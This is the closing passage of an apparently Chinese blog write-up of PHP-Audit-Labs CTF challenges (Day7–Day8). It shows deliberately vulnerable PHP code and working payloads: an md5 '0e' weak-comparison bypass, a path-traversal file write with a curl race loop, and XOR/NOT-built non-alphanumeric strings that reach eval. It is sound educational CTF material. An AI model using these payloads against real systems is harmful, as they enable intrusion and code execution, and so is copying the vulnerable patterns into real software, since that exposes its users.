<span class="number">0777</span>);</span><br><span class="line">        umask(<span class="variable">$oldmask</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ((@<span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>]) &amp;&amp; (@<span class="variable">$_GET</span>[<span class="string">&#x27;content&#x27;</span>])) &#123;</span><br><span class="line">        <span class="comment">//$fp = fopen(&quot;$savepath&quot;.$_GET[&#x27;filename&#x27;], &#x27;w&#x27;);</span></span><br><span class="line">        <span class="variable">$content</span> = <span class="string">&#x27;HRCTF&#123;y0u_n4ed_f4st&#125;   by:l1nk3r&#x27;</span>;</span><br><span class="line">        file_put_contents(<span class="string">&quot;<span class="subst">$savepath</span>&quot;</span> . <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>], <span class="variable">$content</span>);</span><br><span class="line">        <span class="variable">$msg</span> = <span class="string">&#x27;Flag is here,come on~ &#x27;</span> . <span class="variable">$savepath</span> . htmlspecialchars(<span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>]) . <span class="string">&quot;&quot;</span>;</span><br><span class="line">        usleep(<span class="number">100000</span>);</span><br><span class="line">        <span class="variable">$content</span> = <span class="string">&quot;Too slow!&quot;</span>;</span><br><span class="line">        file_put_contents(<span class="string">&quot;<span class="subst">$savepath</span>&quot;</span> . <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>], <span class="variable">$content</span>);</span><br><span class="line">    &#125;</span><br><span class="line">   <span class="keyword">print</span> <span class="string">&lt;&lt;&lt;EOT</span></span><br><span class="line"><span class="string">&lt;form action=&quot;&quot; method=&quot;get&quot;&gt;</span></span><br><span class="line"><span class="string">&lt;div class=&quot;form-group&quot;&gt;</span></span><br><span class="line"><span class="string">&lt;label for=&quot;exampleInputEmail1&quot;&gt;Filename&lt;/label&gt;</span></span><br><span class="line"><span class="string">&lt;input type=&quot;text&quot; class=&quot;form-control&quot; name=&quot;filename&quot; id=&quot;exampleInputEmail1&quot; placeholder=&quot;Filename&quot;&gt;</span></span><br><span class="line"><span class="string">&lt;/div&gt;</span></span><br><span class="line"><span class="string">&lt;div class=&quot;form-group&quot;&gt;</span></span><br><span class="line"><span class="string">&lt;label for=&quot;exampleInputPassword1&quot;&gt;Content&lt;/label&gt;</span></span><br><span class="line"><span class="string">&lt;input type=&quot;text&quot; class=&quot;form-control&quot; name=&quot;content&quot; id=&quot;exampleInputPassword1&quot; placeholder=&quot;Contont&quot;&gt;</span></span><br><span class="line"><span class="string">&lt;/div&gt;</span></span><br><span class="line"><span class="string">&lt;button type=&quot;submit&quot; class=&quot;btn btn-default&quot;&gt;Submit&lt;/button&gt;</span></span><br><span class="line"><span class="string">&lt;/form&gt;</span></span><br><span class="line"><span class="string">EOT</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;you can not see this page&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h3 id="解-6"><a href="#解-6" class="headerlink" title="解:"></a>解:</h3><p>  <code>index.php</code>的代码不多，我直接把全部代码贴出来</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span> = <span class="string">&quot;hongri&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$a</span>;</span><br><span class="line"><span class="variable">$id</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line">@parse_str(<span class="variable">$id</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$a</span>[<span class="number">0</span>] != <span class="string">&#x27;QNKCDZO&#x27;</span> &amp;&amp; md5(<span class="variable">$a</span>[<span class="number">0</span>]) == md5(<span class="string">&#x27;QNKCDZO&#x27;</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;a href=&quot;uploadsomething.php&quot;&gt;flag is here&lt;/a&gt;&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<ul>
<li><p><code>parse_str</code> 将字符串解析为变量</p>
<p>  第六行代码是一个明显的<code>md5</code>弱对比，<code>md5</code>弱对比值只要输入开头为<code>0e</code>的纯数字字符串就可以绕过了</p>
<p>  现在我们的<code>payload</code>应该为<code>?id=a[0]=s1502113478</code>，输入<code>payload</code>就可以跳转到别的<code>php</code>页面了</p>
</li>
</ul>
<p><img src="https://s2.loli.net/2022/01/11/R1LDfGgSNAnuwkT.png" alt="image-20220108165735594"></p>
<p>  <code>uploadsomething.php</code>的代码看起来挺多的，但是最重要的也就是<code>5、6</code>行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$referer</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_REFERER&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$referer</span>)!== <span class="literal">false</span>) &#123;</span><br><span class="line">    <span class="variable">$savepath</span> = <span class="string">&quot;uploads/&quot;</span> . sha1(<span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>]) . <span class="string">&quot;/&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!is_dir(<span class="variable">$savepath</span>)) &#123;</span><br><span class="line">        <span class="variable">$oldmask</span> = umask(<span class="number">0</span>);</span><br><span class="line">        mkdir(<span class="variable">$savepath</span>, <span class="number">0777</span>);</span><br><span class="line">        umask(<span class="variable">$oldmask</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  ...&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li><p><code>HTTP_REFERER</code>为http请求头中的跳转地址</p>
</li>
<li><p><code>REMOTE_ADDR</code> 当前网页的<code>host</code></p>
<p>  看到第2行代码，如果我们的<code>http</code>请求中没有携带<code>referer</code>信息那么直接返回一串字符串，然后程序结束</p>
<p>  在点<code>a</code>链接时会自动携带<code>referer</code>信息，这就是为什么在<code>index.php</code>会出现<code>a链接</code>的原因</p>
<p>  当携带由<code>referer</code>创建由<code>uploads/</code>+<code>sha1($_SERVER[&#39;REMOTE_ADDR&#39;])/</code>组成的目录</p>
<p>  <code>我这里创建目录时可能因为权限问题，没有成功创建目录</code></p>
<p>  现在来到最后的代码</p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ((@<span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>]) &amp;&amp; (@<span class="variable">$_GET</span>[<span class="string">&#x27;content&#x27;</span>])) &#123;</span><br><span class="line">     <span class="comment">//$fp = fopen(&quot;$savepath&quot;.$_GET[&#x27;filename&#x27;], &#x27;w&#x27;);</span></span><br><span class="line">     <span class="variable">$content</span> = <span class="string">&#x27;HRCTF&#123;y0u_n4ed_f4st&#125;   by:l1nk3r&#x27;</span>;</span><br><span class="line">     file_put_contents(<span class="string">&quot;<span class="subst">$savepath</span>&quot;</span> . <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>], <span class="variable">$content</span>);</span><br><span class="line">     <span class="variable">$msg</span> = <span class="string">&#x27;Flag is here,come on~ &#x27;</span> . <span class="variable">$savepath</span> . htmlspecialchars(<span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>]) . <span class="string">&quot;&quot;</span>;</span><br><span class="line">     usleep(<span class="number">100000</span>);</span><br><span class="line">     <span class="variable">$content</span> = <span class="string">&quot;Too slow!&quot;</span>;</span><br><span class="line">     file_put_contents(<span class="string">&quot;<span class="subst">$savepath</span>&quot;</span> . <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>], <span class="variable">$content</span>);</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>

<p>  <code>file_put_contents</code>函数会在前面生成的目录中创建一个由<code>filename</code>控制的文件，内容则是<code>flag</code></p>
<p>  可能因为权限问题创建目录失败，但是我们可以采用<code>路径穿越</code>让代码跳到当前目录创建</p>
<p>  <strong>payload:</strong><code>?filename=../../12.txt&amp;content=123 </code></p>
<p>  但是创建后<code>flag</code>只显示<code>100毫秒</code>，过了这个时间<code>flag</code>就消失换成字符串了，所以我们还需要一个脚本替我们去访问该网页</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash  </span></span><br><span class="line"><span class="keyword">for</span>((i=1;i&lt;=1000;i++));  </span><br><span class="line"><span class="keyword">do</span>   </span><br><span class="line">curl http://192.168.1.11/12.txt</span><br><span class="line"><span class="keyword">done</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/11/pUPnlxQGk5mrSyg.png" alt="image-20220108172106164"></p>
<h2 id="Day8"><a href="#Day8" class="headerlink" title="Day8"></a>Day8</h2><p>  如果想做出该题，就需要了解php中<code>异或(^)</code>、<code>取反(~)</code>的概念，推荐看<a target="_blank" rel="noopener" href="https://www.leavesongs.com/penetration/webshell-without-alphanum.html">p🐂</a>的文章，除了<code>P🐂</code>的还可以看<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/fCxs4hAVpa-sF4tdT_W8-w">信安之路</a>的</p>
<h3 id="Code-4"><a href="#Code-4" class="headerlink" title="Code"></a>Code</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&#x27;flag.php&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$code</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>];</span><br><span class="line">    <span class="comment">// if(strlen($code)&gt;40)&#123;</span></span><br><span class="line">    <span class="comment">//     die(&quot;Long.&quot;);</span></span><br><span class="line">    <span class="comment">// &#125;</span></span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[A-Za-z0-9]+/&quot;</span>,<span class="variable">$code</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;NO.&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$code</span>;</span><br><span class="line">    @<span class="keyword">eval</span>(<span class="variable">$code</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// highlight_file(__FILE__);</span></span><br><span class="line"><span class="comment">// $hint = &quot;php function getFlag() to get flag&quot;;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">  </span><br><span class="line"><span class="comment">#index1.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&#x27;flag.php&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$code</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(strlen(<span class="variable">$code</span>)&gt;<span class="number">50</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;Too Long.&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[A-Za-z0-9_]+/&quot;</span>,<span class="variable">$code</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;Not Allowed.&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    @<span class="keyword">eval</span>(<span class="variable">$code</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line">highlight_file(__FILE);</span><br><span class="line"><span class="comment">// $hint = &quot;php function getFlag() to get flag&quot;;</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line"><span class="comment">#flag.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getFlag</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;HRCTF&#123;y0u_n4ed_f4st&#125;&#x27;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h3 id="解-7"><a href="#解-7" class="headerlink" title="解:"></a>解:</h3><p><strong>取反</strong></p>
<p>  看段代码</p>
<p><img src="https://s2.loli.net/2022/01/11/Dp7hjGw2T8uMRkI.png" alt="image-20220109163345452"></p>
<ul>
<li><p>在<code>utf-8</code>编码中，汉字都是由三个字节组成(Unicode范围由U+0800至U+FFFF),这就是为什么汉字经过<code>utf-8</code>编码会变成三个字节的原因</p>
</li>
<li><p><code>\x</code>代表的是<code>utf-8</code>编码,<code>e5</code>是<code>unicode</code>编码代码的意思</p>
</li>
<li><p><code>229</code>则是<code>e5</code>16进制转成十进制的意思</p>
</li>
</ul>
<p><img src="https://s2.loli.net/2022/01/11/nH576JOl8kfSQYh.png" alt="image-20220109163136257"></p>
<p>  再看段代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="string">&#x27;妙&#x27;</span>;</span><br><span class="line"><span class="keyword">print</span>(~<span class="variable">$a</span>&#123;<span class="number">1</span>&#125;).<span class="string">&quot;&lt;br/&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">print</span>(~<span class="string">&quot;\xa6&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">#输出结果</span></span><br><span class="line">Y</span><br><span class="line">Y</span><br></pre></td></tr></table></figure>

<p>  <code>妙</code>的第二个值为<code>166[0xa6]</code>，取反的值为<code>-167</code></p>
<p>  在16进制中，<code>负数</code>需要采用补码方式来表示，<code>负数</code>的补码是在<code>16进制转二进制的值</code>后将每位值都进行转反,<code>除了符号位</code>，比如<code>1</code>变成<code>0</code>，<code>0</code>变成<code>1</code>，然后再在末尾加上<code>1</code></p>
<p><img src="https://s2.loli.net/2022/01/11/Najlwko1hrCPqVs.png" alt="image-20220109171713273"></p>
<p>  <code>-167</code>的16进制为<code>0xFF59</code></p>
<p>  <code>php</code>中<code>chr函数</code>只能有<code>255</code>个字符输出，每当超出<code>255</code>个字符就开始循环输出</p>
<p>  比如16进制<code>0xFF59</code>转为10进制<code>65369</code>除<code>255</code>剩余<code>89</code>，然后<code>ASCII</code>编码中<code>89</code>是大写<code>Y</code>所以输出了<code>Y</code></p>
<p><img src="https://s2.loli.net/2022/01/11/xDsameNY3MkyiwX.png" alt="image-20220109172543751"></p>
<p><strong>异或</strong></p>
<p>  异或运算也叫半加运算，其运算法相当不带进位的二进制加法</p>
<ul>
<li><p><code>1 XOR 1 = 0</code></p>
</li>
<li><p><code>1 XOR 0 = 1</code></p>
</li>
<li><p><code>0 XOR 1 = 1</code></p>
</li>
<li><p><code>0 XOR 0 = 0</code></p>
<p>  看个<code>demo</code></p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">php &gt; <span class="keyword">echo</span> <span class="string">&#x27;[&#x27;</span>^<span class="string">&#x27;?&#x27;</span>;</span><br><span class="line">d</span><br></pre></td></tr></table></figure>

<p>  <code>[ ASCII编码为 91</code></p>
<p>  <code>? ASCII编码为 63</code></p>
<p>  <code>91、63</code>转为二进制后分别是<code>0101 1011</code>、<code>0011 1111</code></p>
<p>  <code>91、63</code>二进制通过<code>xor</code>后的结果为<code>100</code>二进制是<code>0110 0100</code></p>
<p>  <code>ASCII编码100是d</code>，所以就是为什么<code>[^?</code>输出小写的<code>d</code></p>
<p>  ok，现在我们可以自己写<code>payload</code></p>
<p>  <code>payload</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=$_=%22[[[=,![%22^%22%3C%3E/&#123;@@%3C%22;$_();</span><br></pre></td></tr></table></figure>

<p>  <img src="https://s2.loli.net/2022/01/11/q72dQiW5JDMhBUw.png" alt="image-20220109190602543"></p>
<p>  第二题的多禁止一个<code>_</code>下划线，影响不大，使用<code>拉丁文绕过即可</code></p>
<p><img src="https://s2.loli.net/2022/01/11/pfhQLmtXinIc4b8.png" alt="image-20220109191056735"></p>
<p>  <code>payload</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$ö</span>=<span class="string">&quot;[[[=,![&quot;</span>^<span class="string">&quot;&lt;&gt;/&#123;@@&lt;&quot;</span>;<span class="variable">$ö</span>();</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/11/yLVFsCqpaxdz9RM.png" alt="image-20220109191045089"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87"><span class="toc-number">1.</span> <span class="toc-text">PHP-Audit-Labs-CTF上篇</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day1"><span class="toc-number">1.2.</span> <span class="toc-text">Day1</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Code"><span class="toc-number">1.2.1.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3"><span class="toc-number">1.2.2.</span> <span class="toc-text">解</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day2"><span class="toc-number">1.3.</span> <span class="toc-text">Day2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Code-1"><span class="toc-number">1.3.1.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-1"><span class="toc-number">1.3.2.</span> <span class="toc-text">解:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day3"><span class="toc-number">1.4.</span> <span class="toc-text">Day3</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#code"><span class="toc-number">1.4.1.</span> <span class="toc-text">code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-2"><span class="toc-number">1.4.2.</span> <span class="toc-text">解:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day4"><span class="toc-number">1.5.</span> <span class="toc-text">Day4</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-3"><span class="toc-number">1.5.1.</span> <span class="toc-text">解:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day5"><span class="toc-number">1.6.</span> <span class="toc-text">Day5</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Code-2"><span class="toc-number">1.6.1.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-4"><span class="toc-number">1.6.2.</span> <span class="toc-text">解:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day6"><span class="toc-number">1.7.</span> <span class="toc-text">Day6</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#code-1"><span class="toc-number">1.7.1.</span> <span class="toc-text">code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-5"><span class="toc-number">1.7.2.</span> <span class="toc-text">解:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day7"><span class="toc-number">1.8.</span> <span class="toc-text">Day7</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Code-3"><span class="toc-number">1.8.1.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-6"><span class="toc-number">1.8.2.</span> <span class="toc-text">解:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day8"><span class="toc-number">1.9.</span> <span class="toc-text">Day8</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Code-4"><span class="toc-number">1.9.1.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-7"><span class="toc-number">1.9.2.</span> <span class="toc-text">解:</span></a></li></ol></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&text=PHP-Audit-Labs-CTF上篇"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&title=PHP-Audit-Labs-CTF上篇"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&is_video=false&description=PHP-Audit-Labs-CTF上篇"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=PHP-Audit-Labs-CTF上篇&body=Check out this article: http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&title=PHP-Audit-Labs-CTF上篇"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&title=PHP-Audit-Labs-CTF上篇"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&title=PHP-Audit-Labs-CTF上篇"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&title=PHP-Audit-Labs-CTF上篇"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&name=PHP-Audit-Labs-CTF上篇&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&t=PHP-Audit-Labs-CTF上篇"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021-2026
    John Doe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/projects_url">项目</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
